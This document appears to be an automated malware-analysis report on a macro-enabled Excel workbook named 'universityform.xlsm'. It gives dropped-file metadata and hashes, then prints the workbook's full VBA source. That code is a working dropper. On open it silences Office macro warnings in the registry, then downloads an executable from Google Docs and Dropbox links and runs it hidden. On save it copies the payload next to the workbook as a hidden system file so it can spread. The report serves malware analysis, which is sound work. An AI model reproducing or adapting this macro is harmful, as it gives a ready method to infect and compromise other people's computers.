                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):340
                              Entropy (8bit):3.459340779445105
                              Encrypted:false
                              SSDEEP:6:kKb84G7DYUN+SkQlPlEGYRMY9z+s3Ql2DUeXJlOW1:zHLkPlE99SCQl2DUeXJlOA
                              MD5:9A8E214F911830B9782E7D64BB6F6289
                              SHA1:BD2237256DDF0A2CCC16569D237332BF73AA45B7
                              SHA-256:9D8966AE57EDEC557B7BC776765BE108E4ECF4624B077A09D20D2DE79DB42D01
                              SHA-512:93D29CE1173EACC026B88A3582F9472398CFE160C2BF58D759C59ED63E3207F87D38F78A5C5D967C6E42665D36BC35E5024E9D484DC2BA99DCEB545794290635
                              Malicious:false
                              Reputation:low
                              Preview:p...... ..........!.Z..(..................................................@... ........~..MG......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".0.6.c.f.c.c.5.4.d.4.7.d.b.1.:.0."...
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):1002
                              Entropy (8bit):2.7135540020292455
                              Encrypted:false
                              SSDEEP:24:J3fIxk+vpCHByFQfk6ScvBZGA8xpiOnAvJ5yoIHWWKuZRy:h3+RCHBTfkpcv/GAYcvJ5LIHHKuZw
                              MD5:EC57C120D8BA66C61EB084AEA1D69624
                              SHA1:1C32A99DF245189809895D9FBF6B224C7E9C9182
                              SHA-256:73322ECB056F0B513F27BDD38F03E4B4C6B8B287384446D63D20CF654F3A5841
                              SHA-512:7F2FCDFFC68323E1E201D6B7C2627BEEF6DD0B1A7BF69CA20E16FA4BC57B9B19F4EA243E84DFD986B3723BD4D883174275C03F0A05D574AFD054830EF5583C51
                              Malicious:false
                              Reputation:low
                              Preview:1.1.9.,.1.2.5.,.2.5.5.0.5.0.8.8.,.1.1.9.6.3.7.8.,.3.7.4.6.3.7.6.,.1.7.8.8.6.5.8.,.7.0.0.9.9.8.4.,.3.0.0.4.9.2.6.8.,.3.7.4.6.2.5.9.,.3.7.4.6.2.6.5.,.1.2.2.3.4.3.4.,.3.7.4.6.2.5.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.2.3.7.1.6.5.1.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.1.1.1.1.,.6.3.6.4.3.3.7.,.1.0.0.1.,.6.5.4.0.2.1.5.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.2.4.6.0.9.2.5.8.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.6.3.7.1.6.9.4.,.2.7.1.5.3.4.9.7.,.8.7.4.7.0.1.5.3.,.5.9.2.2.3.4.2.3.,.1.5.6.1.9.5.8.,.5.7.9.9.9.6.6.1.,.5.8.4.2.5.8.6.0.,.2.7.3.6.0.0.9.5.,.6.3.0.6.3.0.9.9.,.6.3.6.4.3.3.0.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.1.6.5.7.4.5.3.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.2.,.1.0.6.9.5.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.7.7.1.6.5.7.,.1.3.5.2.5.8.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.3.2.0.5.9.2.7.6.7.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.1.1.9.6.2.9.3.,.1.9.8.4.4.3.5.,.3.7.4.6.3.7.9.,.3.7.4.6.3.6.9.,.6.1.7.0.7.3.0.5.,.3.1.4.1.5.9.2.0.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):1002
                              Entropy (8bit):2.7135540020292455
                              Encrypted:false
                              SSDEEP:24:J3fIxk+vpCHByFQfk6ScvBZGA8xpiOnAvJ5yoIHWWKuZRy:h3+RCHBTfkpcv/GAYcvJ5LIHHKuZw
                              MD5:EC57C120D8BA66C61EB084AEA1D69624
                              SHA1:1C32A99DF245189809895D9FBF6B224C7E9C9182
                              SHA-256:73322ECB056F0B513F27BDD38F03E4B4C6B8B287384446D63D20CF654F3A5841
                              SHA-512:7F2FCDFFC68323E1E201D6B7C2627BEEF6DD0B1A7BF69CA20E16FA4BC57B9B19F4EA243E84DFD986B3723BD4D883174275C03F0A05D574AFD054830EF5583C51
                              Malicious:false
                              Reputation:low
                              Preview:1.1.9.,.1.2.5.,.2.5.5.0.5.0.8.8.,.1.1.9.6.3.7.8.,.3.7.4.6.3.7.6.,.1.7.8.8.6.5.8.,.7.0.0.9.9.8.4.,.3.0.0.4.9.2.6.8.,.3.7.4.6.2.5.9.,.3.7.4.6.2.6.5.,.1.2.2.3.4.3.4.,.3.7.4.6.2.5.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.2.3.7.1.6.5.1.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.1.1.1.1.,.6.3.6.4.3.3.7.,.1.0.0.1.,.6.5.4.0.2.1.5.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.2.4.6.0.9.2.5.8.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.6.3.7.1.6.9.4.,.2.7.1.5.3.4.9.7.,.8.7.4.7.0.1.5.3.,.5.9.2.2.3.4.2.3.,.1.5.6.1.9.5.8.,.5.7.9.9.9.6.6.1.,.5.8.4.2.5.8.6.0.,.2.7.3.6.0.0.9.5.,.6.3.0.6.3.0.9.9.,.6.3.6.4.3.3.0.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.1.6.5.7.4.5.3.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.2.,.1.0.6.9.5.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.7.7.1.6.5.7.,.1.3.5.2.5.8.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.3.2.0.5.9.2.7.6.7.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.1.1.9.6.2.9.3.,.1.9.8.4.4.3.5.,.3.7.4.6.3.7.9.,.3.7.4.6.3.6.9.,.6.1.7.0.7.3.0.5.,.3.1.4.1.5.9.2.0.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                              File Type:Composite Document File V2 Document, Cannot read section info
                              Category:dropped
                              Size (bytes):32768
                              Entropy (8bit):3.6783090362317954
                              Encrypted:false
                              SSDEEP:192:xum3pnktfe21pkOwpYK3rcd5kM7ffi4UMF3EiRcx+NSJmmI6tNY2pC9:4m3pF29ekfnpVNUmml3Yc
                              MD5:B21A8E948DA9333042E885963CE3FFD8
                              SHA1:5D63C3C700CAF1E5A0622FE7C32C198588E90392
                              SHA-256:AA152F7251FA9BC2DAB38B70C067B657E6E2C344DE78EC327839894520D3D400
                              SHA-512:F06164145DBBD97F5368835F956ED760A2A9C4B68AAED7F7D5B333C8C049AB2FD565878B93119E2E676212C4D9818945DBEC23AF6B6DD99B5EF4FFF64BFF3E39
                              Malicious:false
                              Reputation:low
                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                              File Type:Composite Document File V2 Document, Cannot read section info
                              Category:dropped
                              Size (bytes):24576
                              Entropy (8bit):4.6516061071911725
                              Encrypted:false
                              SSDEEP:192:O2m3pnktfej1pkOwpYK3rcd5kM7ffi4UMF3EiRcx+NSJmmI6tNY2pC9:vm3pFj9ekfnpVNUmml3Yc
                              MD5:CD7DA0F532816E554A5E0B9695E5DE85
                              SHA1:226A3FDB580CCD3EF9DD480D25453A347AD2A7FB
                              SHA-256:12CD044C29938DDAB27983815B1AE8CC08A4B436E0D11259EC1FCD90CDA56211
                              SHA-512:A166DAD9D85FC0CCD6FD93F271874796762A5FA9CCE9ACE2EDB6DB65091395900E858ECA3F8D23BE9376B3BBAE771540891DF7D4F27FC45A93BB10F78BED9743
                              Malicious:false
                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................-.......................................&.......................................................................................................'...(...)...*...+...,...........................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):165
                              Entropy (8bit):1.4377382811115937
                              Encrypted:false
                              SSDEEP:3:KVC+cAmltV:KVC+cR
                              MD5:9C7132B2A8CABF27097749F4D8447635
                              SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                              SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
                              SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                              Malicious:true
                              Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                              File type:Microsoft Excel 2007+
                              Entropy (8bit):7.918521920486396
                              TrID:
                              • Excel Microsoft Office Open XML Format document with Macro (52504/1) 54.97%
                              • Excel Microsoft Office Open XML Format document (35004/1) 36.65%
                              • ZIP compressed archive (8000/1) 8.38%
                              File name:universityform.xlsm
                              File size:94'222 bytes
                              MD5:d04491647385cc373152651890cbc6e0
                              SHA1:b288e5e87ce113af41881431c7004904f6d6ba89
                              SHA256:2ad9a7b364109c68f911729a3dcde001e6df45e80164f87b0054e8e78161fe99
                              SHA512:24912a2896f5a05b0d4e73740d27be623043b4ed23a30b50e75584250ecd0d50647eeeaacf6fb9fe9bfe06848e5ad435d647b01e2583796979a3aa77d769cad9
                              SSDEEP:1536:CguZCa6S5khUI6tHXchBmAXj4znOSjhLM+vGa/M1NIpPkUlB7583fjncFYIIrm0w:Cgugapkhl6tMaPjpM+d/Ms8ULavLcJ/
                              TLSH:9993F1778724791DE1A92C7BC03F6DB16528120C1F41FA8C6D4AF6CC7EDB6066A4ACC8
                              File Content Preview:PK..........!.w.6.............[Content_Types].xml ...(.........................................................................................................................................................................................................
                              Icon Hash:1d356664a4a09519
                              Document Type:OpenXML
                              Number of OLE Files:1
                              Has Summary Info:
                              Application Name:
                              Encrypted Document:False
                              Contains Word Document Stream:False
                              Contains Workbook/Book Stream:True
                              Contains PowerPoint Document Stream:False
                              Contains Visio Document Stream:False
                              Contains ObjectPool Stream:False
                              Flash Objects Count:0
                              Contains VBA Macros:True
                              Author:RPC1
                              Last Saved By:Bruno
                              Create Time:2015-01-15T16:55:01Z
                              Last Saved Time:2024-12-30T21:22:32Z
                              Creating Application:Microsoft Excel
                              Security:0
                              Thumbnail Scaling Desired:false
                              Contains Dirty Links:false
                              Shared Document:false
                              Changed Hyperlinks:false
                              Application Version:16.0300
                              General
                              Stream Path:VBA/ThisWorkbook
                              VBA File Name:ThisWorkbook.cls
                              Stream Size:11862
                              Data ASCII:. . . . . . . . . . . . . . . 8 . . . / . . . = . . . # . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . @ . . . I 9 P . 7 L S . F ' . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . O . . I - n n y . . . . . . . . . . . . . . . . . . . . . . x . . . . O . . I - n n y . I 9 P . 7 L S . F ' . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . S L . . . . S . . . . . S . . . . 0 . L . . . . . 6 " . . . . . < . . . . . . . < . . . . . . . < . . . . . .
                              Data Raw:01 16 01 00 06 00 01 00 00 ec 0a 00 00 e4 00 00 00 38 02 00 00 2f 0b 00 00 3d 0b 00 00 91 23 00 00 0c 00 00 00 01 00 00 00 86 16 cf fa 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 40 00 ff ff 00 00 9b c4 49 39 50 08 37 4c 83 53 bc 08 db 46 27 06 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Attribute VB_Name = "ThisWorkbook"
                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                              Attribute VB_GlobalNameSpace = False
                              Attribute VB_Creatable = False
                              Attribute VB_PredeclaredId = True
                              Attribute VB_Exposed = True
                              Attribute VB_TemplateDerived = False
                              Attribute VB_Customizable = True
                              Dim SheetsChanged As Boolean
                              Dim SheetCount As Integer
                              
                              Private Sub Workbook_Open()
                                Dim i As Integer
                                For i = 1 To ActiveWorkbook.Sheets.Count
                                  ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
                                Next i
                                
                                RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Excel\Security\VBAWarnings", 1, "REG_DWORD"
                                RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\VBAWarnings", 1, "REG_DWORD"
                                
                                Application.DisplayAlerts = False
                                SheetCount = Worksheets.Count
                                
                                Call MPS
                                
                                ActiveWorkbook.Sheets(1).Select
                                SheetsChanged = False
                              End Sub
                              
                              Private Sub Workbook_BeforeClose(Cancel As Boolean)
                                If Not SheetsChanged Then
                                  ActiveWorkbook.Saved = True
                                End If
                              End Sub
                              
                              Private Sub Workbook_SheetChange(ByVal Sh As Object, ByVal Target As Range)
                                SheetsChanged = True
                              End Sub
                              
                              Private Sub Workbook_NewSheet(ByVal Sh As Object)
                                SheetsChanged = True
                              End Sub
                              
                              Private Sub Workbook_SheetActivate(ByVal Sh As Object)
                                If ActiveWorkbook.Sheets.Count <> SheetCount Then
                                  SheetsChanged = True
                                  SheetCount = ActiveWorkbook.Sheets.Count
                                End If
                              End Sub
                              
                              Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
                                Dim i As Integer
                                Dim AIndex As Integer
                                Dim FName
                              
                                AIndex = ActiveWorkbook.ActiveSheet.Index
                              
                                If SaveAsUI = False Then
                                  Cancel = True
                                  Application.EnableEvents = False
                                  Application.ScreenUpdating = False
                                  
                                  For i = 1 To ActiveWorkbook.Sheets.Count - 1
                                    ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
                                  Next i
                                  ActiveWorkbook.Save
                                    
                                  For i = 1 To ActiveWorkbook.Sheets.Count
                                    ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
                                  Next i
                                  ActiveWorkbook.Sheets(AIndex).Select
                                  SheetsChanged = False
                                  
                                  Application.ScreenUpdating = True
                                  Application.EnableEvents = True
                                Else
                                  Cancel = True
                                  Application.EnableEvents = False
                                  Application.ScreenUpdating = False
                                  
                                  For i = 1 To ActiveWorkbook.Sheets.Count - 1
                                    ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
                                  Next i
                                  
                                  FName = Application.GetSaveAsFilename(fileFilter:="Excel alma Kitab (*.xlsm), *.xlsm")
                                  If FName <> False Then
                                    ActiveWorkbook.SaveAs Filename:=FName, FileFormat:=xlOpenXMLWorkbookMacroEnabled
                                    SaveAsInj ActiveWorkbook.Path
                                  End If
                                  
                                  For i = 1 To ActiveWorkbook.Sheets.Count
                                    ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
                                  Next i
                                  ActiveWorkbook.Sheets(AIndex).Select
                                  SheetsChanged = False
                                      
                                  Application.ScreenUpdating = True
                                  Application.EnableEvents = True
                                End If
                              End Sub
                              
                              Sub SaveAsInj(DIR As String)
                                Dim FSO As Object
                                Dim FN As String
                                
                                Set FSO = CreateObject("scripting.filesystemobject")
                                FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                                
                                If FSO.FileExists(FN) Then
                                  If Not FSO.FileExists(DIR & "\~$cache1") Then
                                    FileCopy FN, DIR & "\~$cache1"
                                  End If
                                  SetAttr (DIR & "\~$cache1"), vbHidden + vbSystem
                                End If
                              End Sub
                              
                              Function RegKeyRead(i_RegKey As String) As String
                                Dim myWS As Object
                              
                                On Error Resume Next
                                Set myWS = CreateObject("WScript.Shell")
                                RegKeyRead = myWS.RegRead(i_RegKey)
                              End Function
                              
                              Function RegKeyExists(i_RegKey As String) As Boolean
                              Dim myWS As Object
                              
                                On Error GoTo ErrorHandler
                                Set myWS = CreateObject("WScript.Shell")
                                myWS.RegRead i_RegKey
                                RegKeyExists = True
                                Exit Function
                                
                              ErrorHandler:
                                RegKeyExists = False
                              End Function
                              
                              Sub RegKeySave(i_RegKey As String,                i_Value As String,       Optional i_Type As String = "REG_SZ")
                              Dim myWS As Object
                              
                                Set myWS = CreateObject("WScript.Shell")
                                myWS.RegWrite i_RegKey, i_Value, i_Type
                              End Sub
                              
                              Sub MPS()
                                Dim FSO As Object
                                Dim FP(1 To 3), TMP, URL(1 To 3) As String
                                
                                Set FSO = CreateObject("scripting.filesystemobject")
                                FP(1) = ActiveWorkbook.Path & "\~$cache1"
                                FP(2) = ActiveWorkbook.Path & "\Synaptics.exe"
                              
                                URL(1) = "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"
                                URL(2) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
                                URL(3) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
                                TMP = Environ("Temp") & "\~$cache1.exe"
                                
                                If FSO.FileExists(FP(1)) Then
                                  If Not FSO.FileExists(TMP) Then
                                    FileCopy FP(1), TMP
                                  End If
                                  Shell TMP, vbHide
                                ElseIf FSO.FileExists(FP(2)) Then
                                  If Not FSO.FileExists(TMP) Then
                                    FileCopy FP(2), TMP
                                  End If
                                  Shell TMP, vbHide
                                Else
                                  If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                                    Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                                  ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                                    Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                                  ElseIf Not FSO.FileExists(TMP) Then
                                    If FDW((URL(1)), (TMP)) Then
                                    ElseIf FDW((URL(2)), (TMP)) Then
                                    ElseIf FDW((URL(3)), (TMP)) Then
                                    End If
                                    If FSO.FileExists(TMP) Then
                                      Shell TMP, vbHide
                                    End If
                                  Else
                                    Shell TMP, vbHide
                                  End If
                                  
                                End If
                                
                              End Sub
                              
                              Function FDW(MYU, NMA As String) As Boolean
                                Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                                If WinHttpReq Is Nothing Then
                                  Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                                End If
                              
                                WinHttpReq.Option(0) = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
                                WinHttpReq.Option(6) = AllowRedirects
                                WinHttpReq.Open "GET", MYU, False
                                WinHttpReq.Send
                                
                                If (WinHttpReq.Status = 200) Then
                                  If (InStr(WinHttpReq.ResponseText, "404 Not Found") = 0) And (InStr(WinHttpReq.ResponseText, ">Not Found<") = 0) And (InStr(WinHttpReq.ResponseText, "Dropbox - Error") = 0) Then
                                    FDW = True
                                    Set oStream = CreateObject("ADODB.Stream")
                                    oStream.Open
                                    oStream.Type = 1
                                    oStream.Write WinHttpReq.ResponseBody
                                    oStream.SaveToFile (NMA)
                                    oStream.Close
                                  Else
                                     FDW = False
                                  End If
                                Else
                                  FDW = False
                                End If
                              End Function
                              
                              

                              General
                              Stream Path:PROJECT
                              CLSID:
                              File Type:ASCII text, with CRLF line terminators
                              Stream Size:465
                              Entropy:5.186031070026395
                              Base64 Encoded:True
                              Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 4 C 4 E E 0 B 6 6 0 0 6 6 4 0 6 6 4 0 3 6 9 0 3 6 9 " . . D P B = " 9 8 9 A 3 4 5 B 5 1 5 B 5 1 A 4 A F 5 C 5 1 3 C 7 7 3 5 C E 9 A 0 A 4 9 5 E A 4 B 2 9 F 4 2 0 B 0 4 C 5 D 5
                              Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 48 65 6c 70 46 69 6c 65 3d 22 22 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22
                              General
                              Stream Path:PROJECTwm
                              CLSID:
                              File Type:data
                              Stream Size:41
                              Entropy:2.7478777776526524
                              Base64 Encoded:False
                              Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . . .
                              Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 00 00
                              General
                              Stream Path:VBA/_VBA_PROJECT
                              CLSID:
                              File Type:data
                              Stream Size:3502
                              Entropy:4.951751659616407
                              Base64 Encoded:False
                              Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o
                              Data Raw:cc 61 af 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                              General
                              Stream Path:VBA/__SRP_0
                              CLSID:
                              File Type:data
                              Stream Size:1652
                              Entropy:4.357408478574171
                              Base64 Encoded:False
                              Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . h ) h * O r \\ . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . y . . . . . . . . . . . . . . . . . . . . . 9 . . . . . . . i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . .
                              Data Raw:93 4b 2a af 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 07 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 80 01 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 05 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 05 00 00 7e 66 00 00 7f 00 00 00 00
                              General
                              Stream Path:VBA/__SRP_1
                              CLSID:
                              File Type:data
                              Stream Size:298
                              Entropy:3.310015148206106
                              Base64 Encoded:False
                              Data ASCII:r U . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . C a n c e l . . . . . . . . S h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T a r g e t . . . . . . . . S a v e A s U I . . . . . . . . D I R . . . . . . . . i _ R e g K e y . . . . . . . . i _ V a l u e . . . . . . . . i _ T y p e . . . . . . . . M Y U . . . . . . . . N M A . . . . . . . . . .
                              Data Raw:72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 01 00 00 7e 01 00 00 7e 79 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 09 00 00 00 00 00 03 00 03 00 00 09 19 03 00 00 00 00 00 00 31 06 00 00 00 00 00 00 08 00 00 00 00 00 01 00 02 00 00 08 06 00 00 00 43 61 6e 63 65 6c 01 00 00 08 02 00 00 00 53 68 03 00
                              General
                              Stream Path:VBA/__SRP_2
                              CLSID:
                              File Type:data
                              Stream Size:1284
                              Entropy:2.289242959637628
                              Base64 Encoded:False
                              Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . / . 8 . . . 1 . . . . . . . a . . . . . . . Y . . . . . . . . . . . . . . . ` . . . . . . . ` . . . . . . . ` . . . . . . . ` . . . . . . . ` . . . . . . . ` . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . W . . . . . . . . . .
                              Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 30 00 00 00 00 00 00 00 0c 00 0c 00 00 00 00 00 01 00 01 00 00 00 01 00 b9 05 00 00 00 00 00 00 e1 05 00 00 00 00 00 00 09 06 00 00 00 00 00 00 ff ff ff ff 91 05 00 00 00 00 00 00 08 00 2f 00 38 00 00 00 31 06 00 00 00 00 00 00 61 00 00 00 00 00 01 00 59 06
                              General
                              Stream Path:VBA/__SRP_3
                              CLSID:
                              File Type:data
                              Stream Size:682
                              Entropy:3.010107002295994
                              Base64 Encoded:False
                              Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . . $ . . . . . . . . . . . . ` . . X . . . . . . . . . . . . ( . A . . . . . . . . . . ` . . \\ . . . . . . . . . . . . . . . . . . # 0 . . . . . . . . . . . ` . . ` . $ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . ` . . d . ( . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . ` . . h . , . . . . . . . . . . . . . . . . . . , . A . . . . . . . . . . ` . . l . 0 . . . . . .
                              Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 44 00 00 00 04 00 24 00 01 01 00 00 00 00 02 00 00 00 03 60 00 00 58 04 1c 00 ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 1e 28 00 41 01 00 00 00 00 02 00 01 00 03 60 04 00 5c 04 20 00 ff ff ff ff ff ff ff ff 00 00 00 00 81 00 00 00 00 00 01
                              General
                              Stream Path:VBA/dir
                              CLSID:
                              File Type:data
                              Stream Size:481
                              Entropy:6.240073968176633
                              Base64 Encoded:True
                              Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . v V . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
